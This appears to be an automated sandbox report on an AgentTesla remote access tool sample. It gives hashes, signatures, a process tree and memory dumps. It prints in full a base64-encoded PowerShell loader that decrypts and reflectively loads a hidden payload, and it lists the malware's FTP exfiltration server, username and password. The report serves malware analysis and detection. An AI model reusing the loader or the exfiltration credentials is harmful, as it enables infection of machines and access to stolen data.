Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/05/2024, 18:33

General

  • Target

    file.exe

  • Size

    1.0MB

  • MD5

    dc8a137a9917260473120aa235f69f5f

  • SHA1

    dd74caccc6c2ab38da7f4171d1a64ae506f185b8

  • SHA256

    e47140a389037bf3c66528b2a762dd359b3d2da361f324819b18ca595d2f178e

  • SHA512

    de49ba1a489a488fa15262869f49944a3a46f1d2b2a1fc1e55b7e9914b92d892b5e22bc0230a7e8b7dd072f11753d7d683c4d49cb993d85eff23a92acdc61c19

  • SSDEEP

    12288:MUfbdTxwbed/QIA8EmCCZPyXNDxaMejIQv7iglCqRoeuIIymiR8gZMRnObwZNtV:MUfhTFQBeCHND/j87j8oIhiR8gv69

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.tekserendustriyel.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    chuzy2024@

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEYANQAsACAAMAB4ADYANQAsACAAMAB4AEIAMgAsACAAMAB4ADEANwAsACAAMAB4ADIAOQAsACAAMAB4ADkAMwAsACAAMAB4ADEAQQAsACAAMAB4AEIAMgAsACAAMAB4ADkAQQAsACAAMAB4ADIAQgAsACAAMAB4ADYANAAsACAAMAB4AEQAQQAsACAAMAB4ADAAOQAsACAAMAB4ADQANwAsACAAMAB4ADQARAAsACAAMAB4AEMANAAsACAAMAB4ADIARQAsACAAMAB4ADUANQAsACAAMAB4ADgANQAsACAAMAB4ADgARQAsACAAMAB4AEMAQQAsACAAMAB4AEMANgAsACAAMAB4AEIAMAAsACAAMAB4AEYAMgAsACAAMAB4AEIAOAAsACAAMAB4ADcAOQAsACAAMAB4ADgARgAsACAAMAB4ADEAMQAsACAAMAB4ADAAMgAsACAAMAB4AEQAOQAsACAAMAB4ADAAMwAsACAAMAB4ADIARQApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEQALAAgADAAeABEAEEALAAgADAAeAAwADcALAAgADAAeABCAEMALAAgADAAeABBAEYALAAgADAAeAA2AEQALAAgADAAeAAyADIALAAgADAAeAA3ADMALAAgADAAeAA4ADMALAAgADAAeABDADYALAAgADAAeABFAEMALAAgADAAeABCAEEALAAgADAAeAA0AEUALAAgADAAeAA0AEEALAAgADAAeAA0ADkALAAgADAAeABCADMAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
      2⤵
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4968
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        3⤵
          PID:4988
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          3⤵
            PID:4576
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2252
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
            3⤵
              PID:1436

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2gt4l4m3.vov.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\file-2966.putik

                Filesize

                33KB

                MD5

                3c14b9bc33ce5f0b10b4275a6eaa8357

                SHA1

                32aaab855271823146dd5ae040869b7d3396fe52

                SHA256

                a43e0362fee162598f177bc18013b4cd3861ac166ad1af06b460663a55a2cb35

                SHA512

                f9f9d6f7d2717e49d892e69b67f9ff211ac1d4bee5182297bf39d0a064841a86b15423ac31e6528c2b629354cff5d7dd55739ba1c869b3a60d771da1834377a1

              • memory/2252-21-0x0000000074F60000-0x0000000075710000-memory.dmp

                Filesize

                7.7MB

              • memory/2252-24-0x00000000064B0000-0x0000000006542000-memory.dmp

                Filesize

                584KB

              • memory/2252-27-0x0000000074F60000-0x0000000075710000-memory.dmp

                Filesize

                7.7MB

              • memory/2252-26-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

                Filesize

                4KB

              • memory/2252-25-0x0000000006640000-0x000000000664A000-memory.dmp

                Filesize

                40KB

              • memory/2252-23-0x00000000063C0000-0x0000000006410000-memory.dmp

                Filesize

                320KB

              • memory/2252-17-0x0000000000400000-0x0000000000440000-memory.dmp

                Filesize

                256KB

              • memory/2252-18-0x0000000074F6E000-0x0000000074F6F000-memory.dmp

                Filesize

                4KB

              • memory/2252-19-0x0000000005470000-0x0000000005A14000-memory.dmp

                Filesize

                5.6MB

              • memory/2252-20-0x0000000004FC0000-0x0000000005026000-memory.dmp

                Filesize

                408KB

              • memory/4968-1-0x00007FFBF2453000-0x00007FFBF2455000-memory.dmp

                Filesize

                8KB

              • memory/4968-22-0x00007FFBF2450000-0x00007FFBF2F11000-memory.dmp

                Filesize

                10.8MB

              • memory/4968-16-0x00000181450B0000-0x0000018145144000-memory.dmp

                Filesize

                592KB

              • memory/4968-12-0x00007FFBF2450000-0x00007FFBF2F11000-memory.dmp

                Filesize

                10.8MB

              • memory/4968-15-0x000001812C000000-0x000001812C00C000-memory.dmp

                Filesize

                48KB

              • memory/4968-3-0x00000181442A0000-0x00000181442C2000-memory.dmp

                Filesize

                136KB

              • memory/4968-13-0x00007FFBF2450000-0x00007FFBF2F11000-memory.dmp

                Filesize

                10.8MB